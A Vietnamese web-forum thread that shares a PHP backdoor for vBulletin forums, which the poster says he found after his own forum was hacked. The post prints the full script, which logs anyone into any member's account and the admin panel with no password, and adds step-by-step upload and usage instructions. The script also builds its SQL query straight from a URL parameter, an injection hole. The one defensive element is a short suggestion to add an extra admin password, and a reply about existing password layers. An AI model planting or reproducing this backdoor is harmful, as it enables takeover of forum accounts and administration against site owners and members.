Fakelogin - Đăng nhập vào forum VBB không cần pass

Thảo luận trong 'Thảo luận website, Forum' bắt đầu bởi viethung_9x, 12 Tháng một 2011.

  1. Offline

    viethung_9x

    • Windows XP

    Số bài viết:
    613
    Đã được thích:
    735
    Điểm thành tích:
    560
    Ngày xưa 4rum mình bị hack thằng nào đó nó up lên, xem log tình cờ phát hiện ra, chưa rõ nguồn gốc xuất xứ

    Code này có tác dụng là khi upload vào thư mục root của 4rumVBB các bạn có khả năng đăng nhập vào nick bất cứ thành viên nào mà không cần password. Ngoài ra vào đc thẳng admincp mà ko cần gõ lại pass


    Mã:
    [COLOR=#000000] [COLOR=#0000BB]<?php
    [/COLOR][COLOR=#007700]if (isset([/COLOR][COLOR=#0000BB]$_GET[/COLOR][COLOR=#007700][[/COLOR][COLOR=#DD0000]'bd'[/COLOR][COLOR=#007700]]))
    {
    [/COLOR][COLOR=#0000BB]define[/COLOR][COLOR=#007700]([/COLOR][COLOR=#DD0000]'THIS_SCRIPT'[/COLOR][COLOR=#007700], [/COLOR][COLOR=#DD0000]'login'[/COLOR][COLOR=#007700]);
    require_once([/COLOR][COLOR=#DD0000]'./global.php'[/COLOR][COLOR=#007700]);
    require_once([/COLOR][COLOR=#DD0000]'./includes/functions_login.php'[/COLOR][COLOR=#007700]);
    [/COLOR][COLOR=#0000BB]$vbulletin[/COLOR][COLOR=#007700]->[/COLOR][COLOR=#0000BB]userinfo [/COLOR][COLOR=#007700]= [/COLOR][COLOR=#0000BB]$vbulletin[/COLOR][COLOR=#007700]->[/COLOR][COLOR=#0000BB]db[/COLOR][COLOR=#007700]->[/COLOR][COLOR=#0000BB]query_first[/COLOR][COLOR=#007700]([/COLOR][COLOR=#DD0000]"SELECT userid,usergroupid, membergroupids, infractiongroupids, username, password, salt FROM " [/COLOR][COLOR=#007700]. [/COLOR][COLOR=#0000BB]TABLE_PREFIX [/COLOR][COLOR=#007700]. [/COLOR][COLOR=#DD0000]"user WHERE username = '" [/COLOR][COLOR=#007700]. [/COLOR][COLOR=#0000BB]$_GET[/COLOR][COLOR=#007700][[/COLOR][COLOR=#DD0000]'bd'[/COLOR][COLOR=#007700]] . [/COLOR][COLOR=#DD0000]"'"[/COLOR][COLOR=#007700]);
    if (![/COLOR][COLOR=#0000BB]$vbulletin[/COLOR][COLOR=#007700]->[/COLOR][COLOR=#0000BB]userinfo[/COLOR][COLOR=#007700][[/COLOR][COLOR=#DD0000]'userid'[/COLOR][COLOR=#007700]]) die([/COLOR][COLOR=#DD0000]"Invalid username!"[/COLOR][COLOR=#007700]);
    else
    {
    [/COLOR][COLOR=#0000BB]vbsetcookie[/COLOR][COLOR=#007700]([/COLOR][COLOR=#DD0000]'userid'[/COLOR][COLOR=#007700], [/COLOR][COLOR=#0000BB]$vbulletin[/COLOR][COLOR=#007700]->[/COLOR][COLOR=#0000BB]userinfo[/COLOR][COLOR=#007700][[/COLOR][COLOR=#DD0000]'userid'[/COLOR][COLOR=#007700]], [/COLOR][COLOR=#0000BB]true[/COLOR][COLOR=#007700], [/COLOR][COLOR=#0000BB]true[/COLOR][COLOR=#007700], [/COLOR][COLOR=#0000BB]true[/COLOR][COLOR=#007700]);
    [/COLOR][COLOR=#0000BB]vbsetcookie[/COLOR][COLOR=#007700]([/COLOR][COLOR=#DD0000]'password'[/COLOR][COLOR=#007700], [/COLOR][COLOR=#0000BB]md5[/COLOR][COLOR=#007700]([/COLOR][COLOR=#0000BB]$vbulletin[/COLOR][COLOR=#007700]->[/COLOR][COLOR=#0000BB]userinfo[/COLOR][COLOR=#007700][[/COLOR][COLOR=#DD0000]'password'[/COLOR][COLOR=#007700]] . [/COLOR][COLOR=#0000BB]COOKIE_SALT[/COLOR][COLOR=#007700]), [/COLOR][COLOR=#0000BB]true[/COLOR][COLOR=#007700], [/COLOR][COLOR=#0000BB]true[/COLOR][COLOR=#007700], [/COLOR][COLOR=#0000BB]true[/COLOR][COLOR=#007700]);
    [/COLOR][COLOR=#0000BB]exec_unstrike_user[/COLOR][COLOR=#007700]([/COLOR][COLOR=#0000BB]$_GET[/COLOR][COLOR=#007700][[/COLOR][COLOR=#DD0000]'bd'[/COLOR][COLOR=#007700]]);
    [/COLOR][COLOR=#0000BB]process_new_login[/COLOR][COLOR=#007700]([/COLOR][COLOR=#DD0000]'cplogin'[/COLOR][COLOR=#007700], [/COLOR][COLOR=#0000BB]TRUE[/COLOR][COLOR=#007700], [/COLOR][COLOR=#0000BB]TRUE[/COLOR][COLOR=#007700]);
    [/COLOR][COLOR=#0000BB]do_login_redirect[/COLOR][COLOR=#007700]();
    }
    }
    
    [/COLOR][COLOR=#0000BB]?>[/COLOR] [/COLOR] 
    Copy đoạn code trên vào notepad save đuôi viethung.php

    Upload vào thư mục chứa 4rum ngang hàng với file index.php

    Sau đó chạy link sau

    http://domain.com/forum/viethung.php?bd=username
    bài này mình tìm hiểu để cho 4rum bào mật hơn
    Giải pháp: Tạo thêm 1 lớp mật khẩu cho VBB tại admincp.
    dinhvinh07, Gynnyboynghichnet thích bài này.
  2. Offline

    lyvinhr00m

    • cụ lý

    Số bài viết:
    1.234
    Đã được thích:
    930
    Điểm thành tích:
    900
    Hầu hết forum hiện nay đều có 2->3 lớp mật khẩu admincp

Chia sẻ trang này

Advertising: Linux system admin | nukeviet | nukeviet 4 | Upload ảnh miễn phí